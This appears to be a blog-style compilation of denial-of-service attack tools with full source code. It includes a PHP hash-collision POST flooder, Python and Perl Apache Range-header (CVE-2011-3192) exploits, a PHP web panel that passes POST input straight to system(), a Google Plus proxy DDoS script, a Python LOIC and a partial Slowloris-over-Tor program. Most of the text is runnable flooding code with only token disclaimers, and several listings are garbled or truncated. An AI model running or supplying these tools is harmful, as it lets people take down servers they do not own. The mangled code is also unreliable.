PHP 5.3.x Hash Collision Proof Of Concept Code
Denial of service through hash collisions in POST parameters: every form key in the generated body hashes to the same PHP array bucket, so the server spends quadratic time inserting them while parsing the request.
Examples:
-) Make a single Request, wait for the response and save the response to output0.html
python HashtablePOC.py -u https://host/index.php -v -c 1 -w -o output
-) Flood a server (make 500 requests without waiting for a response):
python HashtablePOC.py -u https://host/index.php -v -c 500
requires Python 2.7
import socket
import sys
import math
import urllib
import string
import time
import urlparse
import argparse
import ssl
def main():
    """Parse the command line, build the colliding-key POST body once and send
    it --count times to the target over a hand-written HTTP/1.1 request.

    Options: -u URL (scheme required), -c N requests, -w wait for and time each
    response, -o PREFIX save each response body to PREFIX<i>.html (implies -w),
    -f FILE dump the payload to a file, -v print the request and the response
    headers. Exits with status 1 on a missing or unsupported scheme.
    Python 2.7 only (bare `print` statements, urlparse, urllib.quote).
    NOTE(review): the indentation of this listing was lost on the page; the
    nesting below is reconstructed from the control flow and should be checked
    against the original.
    """
    parser = argparse.ArgumentParser(description="Take down a remote PHP Host", prog="PHP Hashtable Exploit")
    parser.add_argument("-u", "--url", dest="url", help="Url to attack", required=True)
    parser.add_argument("-w", "--wait", dest="wait", action="store_true", default=False, help="wait for Response")
    parser.add_argument("-c", "--count", dest="count", type=int, default=1, help="How many requests")
    parser.add_argument("-v", "--verbose", dest="verbose", action="store_true", default=False, help="Verbose output")
    parser.add_argument("-f", "--file", dest="file", help="Save payload to file")
    parser.add_argument("-o", "--output", dest="output", help="Save Server response to file. This name is only a pattern. HTML Extension will be appended. Implies -w")
    parser.add_argument('--version', action='version', version='%(prog)s 2.0')
    options = parser.parse_args()
    url = urlparse.urlparse(options.url)
    if not url.scheme:
        print("Please provide a scheme to the URL(http://, https://,..")
        sys.exit(1)
    host = url.hostname
    path = url.path
    port = url.port
    # Default ports; any scheme other than http/https is rejected.
    if not port:
        if url.scheme == "https":
            port = 443
        elif url.scheme == "http":
            port = 80
        else:
            print("Unsupported Protocol %s" % url.scheme)
            sys.exit(1)
    if not path:
        path = "/"
    print("Generating Payload...")
    # 5**7 = 78125 colliding keys (see generatePayload); built once, reused for every request.
    payload = generatePayload()
    print("Payload generated")
    if options.file:
        f = open(options.file, 'w')   # not closed if write() raises; `with` would be safer
        f.write(payload)
        f.close()
        print("Payload saved to %s" % options.file)
    print("Host: %s" % host)
    print("Port: %s" % str(port))
    print("path: %s" % path)
    print
    print
    for i in range(options.count):
        print("sending Request #%s..." % str(i+1))
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        if url.scheme == "https":
            # wrap_socket() with no cert_reqs/ca_certs: the server certificate is NOT verified.
            ssl_sock = ssl.wrap_socket(sock)
            ssl_sock.connect((host, port))
            ssl_sock.settimeout(None)   # blocking with no timeout: recv() below can hang if the server stalls
        else:
            sock.connect((host, port))
            sock.settimeout(None)
        # Hand-built request. NOTE(review): as printed on this page the header
        # lines are separated by bare "\n" and there is no blank line between
        # "Content-Length" and the body; the original almost certainly used
        # "\r\n" (compare the "rnrn"/"rn" literals further down, which look like
        # "\r\n" with the backslashes lost in transcription).
        request = """POST %s HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20 ( .NET CLR 3.5.30729; .NET4.0E)
Content-Length: %s
%s
""" % (path, host, str(len(payload)), payload)
        if url.scheme == "https":
            ssl_sock.send(request)   # send(), not sendall(): a short write of the ~MB body truncates the request
        else:
            sock.send(request)
        if options.verbose:
            if len(request) > 300:
                print(request[:300]+"....")
            else:
                print(request)
            print
        if options.wait or options.output:
            # NOTE(review): time.clock() is CPU time on Unix (wall time only on
            # Windows), so the printed duration is misleading on Linux; time.time() is meant.
            start = time.clock()
            if url.scheme == "https":
                data = ssl_sock.recv(1024)
                string = ""   # shadows the `string` module imported at the top of the file
                while len(data):   # read until the server closes the connection
                    string = string + data
                    data = ssl_sock.recv(1024)
            else:
                data = sock.recv(1024)
                string = ""
                while len(data):
                    string = string + data
                    data = sock.recv(1024)
            elapsed = (time.clock() - start)
            print ("Request %s finished" % str(i+1))
            print ("Request %s duration: %s" % (str(i+1), elapsed))
            # NOTE(review): "rnrn" is "\r\n\r\n" with the backslashes lost; as
            # written the separator never matches an HTTP response, so `header`
            # receives the whole response and `content` is empty.
            split = string.partition("rnrn")
            header = split[0]
            content = split[2]
            if options.verbose:
                # only print http header
                print
                print(header)
                print
            if options.output:
                f = open(options.output+str(i)+".html", 'w')
                f.write("rn"+content)   # same transcription loss: "rn" was "\r\n"
                f.close()
        if url.scheme == "https":
            ssl_sock.close()
            sock.close()
        else:
            sock.close()
def generatePayload():
    """Build the colliding-keys POST body.

    Five two-byte blocks are chosen so that every block has the same DJBX33A
    value (h = h * 33 + c), the hash PHP's hashtable uses for string keys:
    'Ez' = 69*33+122, 'FY' = 70*33+89, 'G8' = 71*33+56, 'H'+0x17 = 72*33+23
    and 'D'+0x9b = 68*33+155 are all 2399. Two strings made of the same
    number of such blocks therefore hash identically, so all 5**7 = 78125
    14-byte keys land in one bucket and inserting them degenerates into a
    quadratic chain walk on the server.

    Returns a urlencoded string of "key=&key=&..." pairs (the trailing "&" is
    harmless to PHP's parser); total size is well under the 8 MB default
    mentioned below.
    """
    # Taken from:
    # https://github.com/koto/blog-kotowicz-net-examples/tree/master/hashcollision
    # Note: Default max POST Data Length in PHP is 8388608 bytes (8MB)
    # entries with collisions in PHP hashtable hash function
    a = {'0':'Ez', '1':'FY', '2':'G8', '3':'H'+chr(23), '4':'D'+chr(122+33)}
    # how long should the payload be -- blocks per key, i.e. 5**7 keys in total
    length = 7
    size = len(a)
    post = ""
    # size ** length, via a float detour that is not needed for these magnitudes
    maxvaluefloat = math.pow(size,length)
    maxvalueint = int(math.floor(maxvaluefloat))
    for i in range (maxvalueint):
        # Enumerate every base-5 string of `length` digits, zero-padded ...
        inputstring = base_convert(i, size)
        result = inputstring.rjust(length, '0')
        # ... and substitute each digit with its colliding block. Replacement
        # order does not matter because no block contains a digit.
        for item in a:
            result = result.replace(item, a[item])
        # quote() percent-encodes the two non-printable bytes (0x17, 0x9b).
        # NOTE(review): 78k string concatenations; ''.join over a list is the idiom.
        post += '' + urllib.quote(result) + '=&'
    return post;
def base_convert(num, base):
fullalphabet = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
alphabet = fullalphabet[:base]
if (num == 0):
return alphabet[0]
arr = []
base = len(alphabet)
while num:
rem = num % base
num = num // base
arr.append(alphabet[rem])
arr.reverse()
return ''.join(arr)
# Script entry point (Python 2.7, see the header notes).
if __name__ == "__main__":
    main()
KillApachePy Range Header DoS
If you are following security trends you have probably heard about the DoS attack against a large number of Apache versions using a specially crafted Range header (CVE-2011-3192). Based on the original PoC (killapache.pl) I have made a Python version that is more user friendly and has a few workflow enhancements (automatic use of the maximum number of threads the system allows, a custom HTTP method (GET/HEAD/...), a custom target page, proxy support, etc.).
p.s. Python v2.5.x-v2.7.x is required: the code uses Python 2-only syntax (print statements, `except X, msg`, xrange, urllib2/urlparse).
[cc lang="python"]#!/usr/bin/env python
import optparse, os, re, socket, threading, time, urllib, urllib2, urlparse
NAME = "KillApachePy (Range Header DoS CVE-2011-3192)"
VERSION = "0.1d"
AUTHOR = "Miroslav Stampar (http://unconciousmind.blogspot.com | @stamparm)"
LICENSE = "Public domain (FREE)"
SLEEP_TIME = 3 # time to wait for new thread slots (after max number reached)
RANGE_NUMBER = 1024 # number of range subitems forming the DoS payload
USER_AGENT = "KillApachePy (%s)" % VERSION
def attack(url, user_agent=None, method='GET', proxy=None):
    # Probe the target once with a many-range Range header and, if the reply
    # looks vulnerable, spawn as many threads as the interpreter allows, each
    # repeating that request, until Ctrl-C. Returns None. Python 2 only.
    # NOTE(review): the indentation of this listing was lost on the page; the
    # nesting below is reconstructed and should be checked against the source.
    url = ("http://%s" % url) if '://' not in url else url
    host = urlparse.urlparse(url).netloc
    # NOTE(review): not a raw string; "\A" and "\Z" only survive because Python 2
    # keeps unknown escapes verbatim. Should be r'\Ahttp(s)?://...'.
    if proxy and not re.match('\Ahttp(s)?://[^:]+:[0-9]+(/)?\Z', proxy, re.I):
        print "(x) Invalid proxy address used"
        exit(-1)
    proxy_support = urllib2.ProxyHandler({'http': proxy} if proxy else {})
    opener = urllib2.build_opener(proxy_support)
    urllib2.install_opener(opener)   # process-wide: every urlopen() from here on goes through the proxy
    class _MethodRequest(urllib2.Request): # Create any HTTP (e.g. HEAD/PUT/DELETE) request type with urllib2
        def set_method(self, method):
            self.method = method.upper()
        def get_method(self):
            return getattr(self, 'method', urllib2.Request.get_method(self))
    def _send(check=False): #Send the vulnerable request to the target
        if check:
            print "(i) Checking target for vulnerability..."
        # "bytes=0-,5-1,5-2,...,5-1023": one open range plus RANGE_NUMBER-1 overlapping ones.
        payload = "bytes=0-,%s" % ",".join("5-%d" % item for item in xrange(1, RANGE_NUMBER))
        try:
            headers = { 'Host': host, 'User-Agent': user_agent or USER_AGENT, 'Range': payload, 'Accept-Encoding': 'gzip, deflate' }
            req = _MethodRequest(url, None, headers)
            req.set_method(method)
            response = urllib2.urlopen(req)
            if check:
                # "Vulnerable" here means the server honoured the multi-range request
                # (multipart/byteranges body or 206); a patched server ignores it.
                return response and ('byteranges' in repr(response.headers.headers) or response.code == 206)
        except urllib2.URLError, msg:
            if any([item in str(msg) for item in ('Too many', 'Connection reset')]):
                pass   # expected once the target is saturated
            elif 'timed out' in str(msg):
                print "\r(i) Server seems to be choked ('%s')" % msg
            else:
                print "(x) Connection error ('%s')" % msg
            # NOTE(review): placement relative to the if/elif/else above is a guess
            # (indentation lost). os._exit() from a worker thread ends the whole
            # process immediately, without flushing or joining other threads.
            if check or 'Forbidden' in str(msg):
                os._exit(-1)
        except Exception, msg:
            raise   # no-op handler: re-raises unchanged
    try:
        if not _send(check=True):
            print "(x) Target does not seem to be vulnerable"
        else:
            print "(o) Target seems to be vulnerable\n"
            quit = False   # shadows the builtin quit()
            while not quit:
                threads = []
                print "(i) Creating new threads..."
                try:
                    # Spawn until the interpreter refuses ("can't start new thread");
                    # that exception is the intended exit from this loop.
                    while True:
                        thread = threading.Thread(target=_send)
                        thread.start()
                        threads.append(thread)
                except KeyboardInterrupt:
                    quit = True
                    raise
                except Exception, msg:
                    if 'new thread' in str(msg):
                        print "(i) Maximum number of new threads created (%d)" % len(threads)
                    else:
                        print "(x) Exception occured ('%s')" % msg
                finally:
                    if not quit:
                        print "(o) Waiting for %d seconds to acquire new threads" % SLEEP_TIME
                        time.sleep(SLEEP_TIME)   # threads are never joined; the next round starts while old ones may still run
                        print
    except KeyboardInterrupt:
        print "\r(x) Ctrl-C was pressed"
        os._exit(1)
# Command line: -u is effectively required (without it only the help is
# printed); --method is passed through verbatim and --proxy must match the
# http(s)://host:port pattern checked inside attack(). Python 2 only.
if __name__ == "__main__":
    print "%s #v%s\n by: %s\n" % (NAME, VERSION, AUTHOR)
    parser = optparse.OptionParser(version=VERSION)
    parser.add_option("-u", dest="url", help="Target url (e.g. \"http://www.target.com/index.php\")")
    parser.add_option("--agent", dest="agent", help="User agent (e.g. \"Mozilla/5.0 (Linux)\")")
    parser.add_option("--method", dest="method", default='GET', help="HTTP method used (default: GET)")
    parser.add_option("--proxy", dest="proxy", help="Proxy (e.g. \"http://127.0.0.1:8118\")")
    options, _ = parser.parse_args()
    if options.url:
        # attack() returns nothing; `result` is never used.
        result = attack(options.url, options.agent, options.method, options.proxy)
    else:
        parser.print_help()[/cc]
ThcSslDOS
Description
THC has released a DOS tool that exploits SSL renegotiation to perform a denial of service on a given SSL server. It uses renegotiation to constantly trigger new SSL handshakes with the server, using one single TCP connection. See http://www.thc.org/thc-ssl-dos/ . For more information about renegotiation, see InsecureRenegotiation.
Detection
The current version of THC's SSL DOS tool requires the server to honor client-initiated renegotiations in order to work, so checking whether a server accepts client-initiated renegotiation is a sufficient first test. sslyze's --reneg check reports exactly that:

[cc lang="bash"]$ python sslyze.py --reneg www.server.com:443 [/cc]
Recommendation
A mitigation against the current version of THC's SSL DOS tool is to prevent the server from honoring client-initiated renegotiations. However, as explained on their website, "The tool can be modified to work without SSL-RENEGOTIATION by just establishing a new TCP connection for every new handshake".
Download here
Killapache DDOS improved
[cc lang="html"]
/*
Devoted my ex-girlfriend Kh. Alana[from Kagan city] (;
k!ll m3 --- s4f3 the fuck'!n w0rldzzzzz
S4(uR4, r00tw0rm __2011__
w4tch u. h4ck u. fuck u.
Pr!v8 2 Publ!c
*/
error_reporting(0);
`chmod -R 777 *`;
?>
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 __ __ __ __ 1 1 /'__`\ /'__`\/\ \__ /'__`\ 0 0 _ __ /\ \/\ \/\ \/\ \ \ ,_\ __ __ __/\ \/\ \ _ __ ___ ___ 1 1 /\`'__\ \ \ \ \ \ \ \ \ \ \/ /\ \/\ \/\ \ \ \ \ \/\`'__\/' __` __`\ 0 0 \ \ \/ \ \ \_\ \ \ \_\ \ \ \_\ \ \_/ \_/ \ \ \_\ \ \ \/ /\ \/\ \/\ \ 1 1 \ \_\ \ \____/\ \____/\ \__\\ \___x___/'\ \____/\ \_\ \ \_\ \_\ \_\ 0 0 \/_/ \/___/ \/___/ \/__/ \/__//__/ \/___/ \/_/ \/_/\/_/\/_/ 1 1 0 0 1 1 >> 4L4N4 K!LL3R 0 0 >> author : S4(uR4 1 1 >> sanjar[at]xakep[dot]ru 0 0 >> Priv8 v.0.1 1 1 >> )c( 2011 0 0 1 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-0
[CHECK] (Vulned : "HTTP/1.1 206 Partial Content") ::
echo " "; ?>
echo "PWD :: ".`pwd`; $tmp1 = "alana_kill3r.sh"; if (is_writable($tmp1)) { ?>
echo"
"; ";
";
//if(!empty($_POST[0])){
echo "
"."[+] Server Test Running :
";
echo "
";
system('curl -I -H "Range : bytes=0-1,0-2" -s '.$_POST["test_url"]);
echo "[ATACK] ::
[LOG] ::
echo "
SYSTEM :: ".`uname -a`;
echo "
ID :: ".`id`;
echo "
DATE :: ".`date`."
";
`touch alana_kill3r.sh`;
$apache_killer = <<
test "$1" == "" && echo $0 requests threads target-url && exit 0
seq 1 $1 | xargs -I{} -P $2 curl -I -H "User-Agent:" \
-H "Range: bytes=0-`printf ',5-%d' {10..1000}`" \
--compress -s $3 | grep HTTP
XPLOIT;
if (!$handle = fopen($tmp1, 'w+')) {
echo "[x] Can't open file ($tmp1)";
exit;
}
if (fwrite($handle, $apache_killer) === FALSE) {
echo "[x] Can't write file ($tmp1)";
exit;
}
echo "
"."[+] ALL OK, xpl0it Writed";
fclose($handle);
} else {
echo "
[x] File $tmp1 has not access to write";
}";
$pwd = "-al";
system("ls ".$pwd);
echo "
echo "
"."[+] Xploit Started with :
";
`chmod +x`.$tmp1;
echo "
root@r00tw0rm:$ ";
system("bash ./".$tmp1." ".$_POST["request"]." ".$_POST["threads"]." ".$_POST["url"]);
echo "
?>
[/cc]
Slow HTTP DoS tool – slowhttptest
Slow HTTP DoS attacks rely on the fact that the HTTP protocol, by design, requires a request to be completely received by the server before it is processed. If an HTTP request is incomplete, or its transfer rate is very low, the server keeps resources tied up waiting for the rest of the data; if too many resources are held this way, legitimate clients are denied service. slowhttptest sends such partial HTTP requests and reports whether the target stops serving.
The tool actively tests whether enough server resources can be acquired by slowing down requests to cause an application-layer denial of service.
install:
[cc lang="bash"]tar -xzvf slowhttptest-1.0.tar.gz
cd slowhttptest-1.0
./configure --prefix=PREFIX
make
make install[/cc]
example:
[cc lang="bash"]./slowhttptest -c 1000 -B -g -o my_server_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u https://myseceureserver/resources/index.html -x 10[/cc]
Google Plus DDoS attack script
[cc lang="bash"]#!/bin/bash
# Bug found by #
# Simone 'R00T_ATI' Quatrini #
# Mauro 'epicfail' Gasperini #
# Site: http://www.ihteam.net #
# Fire $2 request pairs at two Google endpoints that fetch an arbitrary URL
# (the Google+ link preview and the opensocial gadget proxy), sleep, recurse.
# Parameters $1 and $3 are ignored: the body reads the globals $url
# (percent-encoded) and $urlclear set at top level. Every curl is backgrounded
# with nohup and never waited for, so each round leaves 2*$2 processes in
# flight; the recursion has no exit other than Ctrl-C.
function start {
    echo "[*] Sending `echo $2` Requests..."
    for a in `seq $2`
    do
        # NOTE(review): $RANDOM is 0..32767, so the modulo is a no-op and the
        # request id is simply 3000000 + RANDOM.
        id=$((RANDOM%3999999+3000000))
        # -k disables TLS certificate verification.
        nohup curl "https://plus.google.com/_/sharebox/linkpreview/?c=$url&t=1&_reqid=$id&rt=j" -k -A "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0" > /dev/null 2>&1 &
        nohup curl "https://images2-focus-opensocial.googleusercontent.com/gadgets/proxy?url=$urlclear&container=focus" -k -A "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0" > /dev/null 2>&1 &
    done
    echo "[*] Still attacking `echo $urlclear`"
    echo "[*] Sleeping for 10 Seconds"
    sleep 10
    # Literal words "url"/"urlclear" are passed, not their values; only $2 matters.
    start url $2 urlclear
}
# Banner, argument checks, minimal percent-encoding of the target, then the
# endless start loop. Usage: $0 <target-url> <requests-per-round>.
echo ''
echo ' 88888888ba, 88888888ba, ad88888ba '
echo ' aa 88 `"8b 88 `"8b d8" "8b '
echo ' 88 88 `8b 88 `8b Y8, '
echo 'aaaa88aaaa 88 88 88 88 ,adPPYba, `Y8aaaaa, '
echo '""""88"""" 88 88 88 88 a8" "8a `"""""8b, '
echo ' 88 88 8P 88 8P 8b d8 `8b '
echo ' "" 88 .a8P 88 .a8P "8a, ,a8" Y8a a8P '
echo ' 88888888Y"" 88888888Y"" `"YbbdP"" "Y88888P"'
echo ''
if [ "$#" -lt 2 ]; then
    # NOTE(review): this echo is cut short on the page (the "<url> <count>"
    # part and closing quote were most likely eaten with the angle brackets);
    # as printed the script is not valid shell.
    echo "Usage: $0
    echo "Example: $0 http://www.site.com/very_big_file.tar.gz 1000"
    echo ""
    exit 0
fi
# Second argument must be all digits.
case $2 in
    *[!0-9]* ) echo "$2 is not numeric" && exit 1;;
esac
echo "Attack -->" $1
# Only "/" and ":" are percent-encoded for the linkpreview c= parameter;
# this is not a full URL-encoding ("?", "&", "=" etc. pass through).
match1=/
repl1=%2F
match2=:
repl2=%3A
url=$1
urlclear=$1
url=${url//$match1/$repl1}
url=${url//$match2/$repl2}
echo ""
echo "[*] Loop started! CTRL+C to stop"
echo ""
start url $2 urlclear[/cc]
Educational purpose only. Do not start a DDoS attack on servers that you do not own.
source here and author
Apache httpd Remote Denial of Service – Killapache
[cc lang="perl"]#Apache httpd Remote Denial of Service (memory exhaustion)
#By Kingcope
#Year 2011
#
# Will result in swapping memory to filesystem on the remote side
# plus killing of processes when running out of swap space.
# Remote System becomes unstable.
#
use IO::Socket;
use Parallel::ForkManager;
# Print the command-line help.
# NOTE(review): the "usage:" line is cut short on this page (the
# "<host> [numforks]\n" part and its closing quote were most likely eaten with
# the angle brackets); as printed it is not valid Perl.
sub usage {
    print "Apache Remote Denial of Service (memory exhaustion)\n";
    print "by Kingcope\n";
    print "usage: perl killapache.pl
    print "example: perl killapache.pl www.example.com 50\n";
}
# One attack round: fork $numforks children (Parallel::ForkManager) and have
# each send a single HEAD request whose Range header lists 1300 overlapping
# byte ranges (",5-0,5-1,...,5-1299"). Per the file header, the affected
# Apache versions (CVE-2011-3192, see the KillApachePy section) buffer every
# range and exhaust memory. Uses globals $ARGV[0], $numforks, $p, $pm, $k, $x.
sub killapache {
    print "ATTACKING $ARGV[0] [using $numforks forks]\n";
    $pm = new Parallel::ForkManager($numforks);
    $|=1;               # unbuffered STDOUT so progress shows immediately
    srand(time());      # unused: nothing below calls rand()
    $p = "";
    # Build the range list once per round into the global $p.
    for ($k=0;$k<1300;$k++) {
        $p .= ",5-$k";
    }
    for ($k=0;$k<$numforks;$k++) {
        my $pid = $pm->start and next;   # parent: keep looping; child: fall through
        $x = "";                          # unused
        # No check that the connect succeeded; print on an undef $sock dies.
        my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
            PeerPort => "80",
            Proto => 'tcp');
        # The child overwrites its own copy of $p with the full request; the
        # parent's range list is unaffected.
        $p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
        print $sock $p;
        while(<$sock>) {   # drain the response until the server closes
        }
        $pm->finish;
    }
    $pm->wait_all_children;
    print ":pPpPpppPpPPppPpppPp\n";
}
# Probe whether the target "seems vuln".
# NOTE(review): this is a weak test. It is called at the bottom of the file
# before killapache() ever runs, so the global $p is still undefined and the
# header actually sent is just "Range:bytes=0-" -- a single, ordinary range.
# Any server that supports byte ranges answers "206 Partial Content", patched
# or not, so matching /Partial/ on the status line only proves Range support,
# not the CVE-2011-3192 condition. Also no check that the connect succeeded.
sub testapache {
    my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
        PeerPort => "80",
        Proto => 'tcp');
    $p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
    print $sock $p;
    $x = <$sock>;   # first line only: the status line
    if ($x =~ /Partial/) {
        print "host seems vuln\n";
        return 1;
    } else {
        return 0;
    }
}
# Entry point: no arguments -> usage; optional second argument = fork count
# (default 50); then probe and attack forever.
# NOTE(review): "$#ARGV > 1" is only true with three or more arguments
# ($#ARGV is the last index), so "perl killapache.pl host 50" has $#ARGV == 1
# and silently falls back to the default of 50 -- the test should be
# "$#ARGV >= 1". The example in usage() happens to pass 50, which hides this.
if ($#ARGV < 0) {
    usage;
    exit;
}
if ($#ARGV > 1) {
    $numforks = $ARGV[1];
} else {$numforks = 50;}
$v = testapache();
if ($v == 0) {
    print "Host does not seem vulnerable\n";
    exit;
}
# Rounds repeat until the process is killed; there is no stop condition.
while(1) {
    killapache();
}[/cc]
Python Low Orbit Ion Cannon released – PythonLOIC – source
Python low orbit ion cannon
Here it is:
[cc lang="python"]
# -*- coding: cp1252 -*-
import time
import os
from ftplib import *
import urllib.request
import socket
import re
# Interactive command loop (Python 3: input(), urllib.request). Each command is
# an `if` on the lowercased line; a history of targets is appended to
# history.txt in the working directory. All network actions shell out to
# ping/whois/su/sudo via os.popen/os.system with the raw user input
# interpolated into the command string (no quoting).
# NOTE(review): indentation of this listing was lost on the page; the nesting
# below (including the while/else in the ddosping branch) is reconstructed and
# should be checked against the original.
liste=['whoami', 'whois', 'ping', 'ddos', 'help', 'http','del history','history','flood','ip']
fin = False
adieu = ['bye', 'salut', 'a+', 'ciao', 'exit','quit','killme','kill','stfu','see you','au revoir']
help = ' DDOSPING for ddossing with ping of the death \n HTTP for ddossing with http \n PING just to ping a server\n FLOOD to flood with pings (need administrador account) \n HISTORY to show history \n DEL HISTORY to delete the history \n CTRL+C or EXIT to quit\n WHOIS to whois\n WHOAMI if you are amnesic\n IP to see your current ip adress'
# a, b: loop counters shared across commands and never reset, so a second
# ddosping run performs fewer iterations than asked. `help` shadows the builtin.
a=0;b=0;com=100;cm=100
title = '--------------------------------------------'
body = '~~~~~~~~~~~~~~~~~~~~~'
O = ''          # unused
lignes=''       # unused
run = 'RUNNING'
ip = lignes     # unused
print (title+'\npython L.O.I.C for python 3.2 Version 2\n'+title)
print ('HELP for commands and help')
print (body+"\nI'm not responsable of your acts with this software. \nJe ne suis pas responsable de vos actes avec ce logiciel.\n"+body)
while fin == False:
    command=input('Hunt:\ ').lower()
    # NOTE(review): 'ddosping' is not in `liste` (only 'ddos' is), so every
    # ddosping run also ends with the "> ?!" message from the elif at the bottom.
    if command == 'ddosping':
        site = input('ping of the death ... to: ')
        if site == 'cancel':
            break   # leaves the whole program, not just this command
        fichier = open('history.txt', 'a')
        fichier.write("ddos "+site+"\n")
        fichier.close()
        cm = int(input('how many times?: '))
        # os.popen() starts "ping <site>" through the shell and neither reads
        # nor waits on it; what happens to the child afterwards is
        # platform-dependent. No argument count is given, so on Linux each ping
        # runs until stopped.
        while a <= cm:
            print ("running ddossing...".upper())
            ping=os.popen("ping " + site)
            a += 1
            print (a)
        else:
            # while/else: runs once the loop above finishes (it never breaks).
            print (run.capitalize(),'ddosing...'.upper())
            s = int(input("size of packets?"))
            s = " -s "+str(s)
            load = int(input("numbers of packets"))
            load = " -l "+str(load)
            # NOTE(review): no space before "-t", so the host becomes "<site>-t";
            # and the flags mix implementations: -t (Windows: ping until stopped),
            # -f (Linux/BSD: flood, root only), -s (Linux: size), -l (Windows: size;
            # Linux: preload). No single ping accepts this as intended.
            site = site + '-t -f '+s +load
            com = int(input("How many times??: "))
            print ("running ddossing".upper())
            while b < com:
                ping=os.popen("ping " + site)
                b += 1
                print (b)
            fichier = open('history.txt', 'a')
            fichier.write("ping "+site+'\n')
            fichier.close()
    if command == 'del history':
        fichier = open('history.txt', 'w')   # truncates the file
        fichier.write('')
        fichier.close()
        print("History deleted")
    if command == 'history':
        print ('History: \n')
        try:
            fichier = open('history.txt', 'r')
            print(fichier.read())
            fichier.close()
        except IOError:
            print ('Not found !')
    if command == 'ping':
        pingsites = input('to~> ')
        hm = str(input("How many pings ? "))   # str() is redundant: input() already returns str
        wi = str(input("What interval ? in sec "))
        os.system('ping -c '+hm+' -i '+wi+' '+pingsites)   # Linux-style flags, synchronous
        fichier = open('history.txt', 'a')
        fichier.write("ping "+pingsites+'\n')
        fichier.close()
    if command == 'flood':
        os1=['fedora']
        os2=['debian','mac os','ubuntu']
        pingsites = input('ping to~> ')
        hm = str(input("How many pings ? "))
        flood = str('ping -c '+hm+' -f '+pingsites)
        try:
            fdmu = str(input("On what OS are you ? fedora/debian/mac os/ubuntu\n")).lower()
        except:
            # Bare except; if input() did raise, `fdmu` is unbound and the next
            # line raises NameError.
            print("Please choose an OS.")
        if fdmu in os1:
            os.system('su -c '+"'"+flood+"'")   # Fedora path: root via su
        if fdmu in os2:
            os.system('sudo '+flood)            # Debian/Ubuntu/macOS path: sudo
        # NOTE(review): precedence bug -- parsed as (fdmu not in os1) and os2, and a
        # non-empty list is truthy, so "not supported" is printed for every
        # non-fedora answer, including debian/ubuntu/mac os.
        if fdmu not in os1 and os2:
            print("This OS is not supported")
        fichier = open('history.txt', 'a')
        fichier.write("pingflood "+pingsites+'\n')
        fichier.close()
    if command == 'http':
        e = 0
        httpsite = input("to~> ")
        hwt = int(input("How many times ? "))
        fichier = open('history.txt', 'a')
        fichier.write("httpddos "+httpsite+"\n")
        fichier.close()
        # Sequential: each GET of http://<site>/ is fully read before the next
        # one starts, so this issues hwt+1 ordinary requests one after another.
        while e<=hwt:
            with urllib.request.urlopen('http://'+httpsite+'/') as page:
                page.read()
            e += 1
            print (e)
    if command == 'whois':
        whoisname = input("Who ? ")
        os.system("whois "+whoisname)
        fichier = open('history.txt', 'a')
        fichier.write("whois "+whoisname+"\n")
        fichier.close()
    if command == 'whoami':
        os.system("whoami")
    if command == 'help':
        print (help)
    if command == 'ip':
        # External address comes from a third-party lookup service; this
        # endpoint may no longer exist -- confirm before relying on it.
        print ('local ip: '+socket.gethostbyname(socket.gethostname())+'\nFinding external ip, will take a while')
        print('external ip: '+str(urllib.request.urlopen("http://automation.whatismyip.com/n09230945.asp").read(), "utf8"))
    if command in adieu:
        fin=True
    elif command not in liste:
        print ('> ?!')
print ("Good bye")
quit()[/cc]
Other versions here
Educational purpose only! I am not responsible for any illegal usage / damage made by this tool.
Slowloris with a twist over tor
Someone decided to post this on fulldisclosure.
Posted here for educational purposes only.
[cc lang="c"]/* =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
* Slowloris with a twist over tor
* =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
*
* Due to the alpha version of this code being leaked I've decided
* to release an improved version to fully show this method of
* attack mostly free of the bugs / dependency on torsocks. This
* attack works on a similar idea of slowloris only it sends packets
* containing a single 0x00 and optionally nothing causing Apache
* to keep the connection alive almost indefinitely.
*
* Due to no one knowing how th3j35t3r's XerXes works I can not say
* if this is the same method. This was one of my many ideas I was
* exploring as to how it could possibly work that has some successful
* results.
*
* - SanguineRose / William Welna
*
* Leaked Version
* http://seclists.org/fulldisclosure/2011/Jul/84
*/
#include /* Re-connecting to tor sometimes takes a while, in order for this to be effective it requires typedef struct { // Simple debug function int make_socket(const char *host, const char *port) { /* Opens SOCKS5 connection to tor // This is for the SIGPIPE error on bad connections / premature closing void *attack(void *arg) { void do_help(char *n) { void *cycle_identity() { int main(int argc, char **argv) {
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
* mass amounts of threads handling only a few connections each, since this is a POC I will leave
* it up to others to fix that. It also has limited success/attack lengths due to tor being slow
*/
#define CONNECTIONS 3
#define THREADS 148
const char *host, *port;
} thread_args;
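/* Debug helper: hex-dump `size` bytes of `data` to stderr, one byte per line,
 * each line indented under `name` (the original behaviour). Bytes are widened
 * through unsigned char so values >= 0x80 print as two hex digits instead of
 * the sign-extended "ffffffXX" a plain char gives with %x. Only referenced
 * from a commented-out call in the SOCKS connect routine. */
void dump_array(char *name, char *data, int size) {
    int i, indent = strlen(name) + 2;
    fprintf(stderr, "%s { ", name);
    for (i = 0; i < size; i++) {
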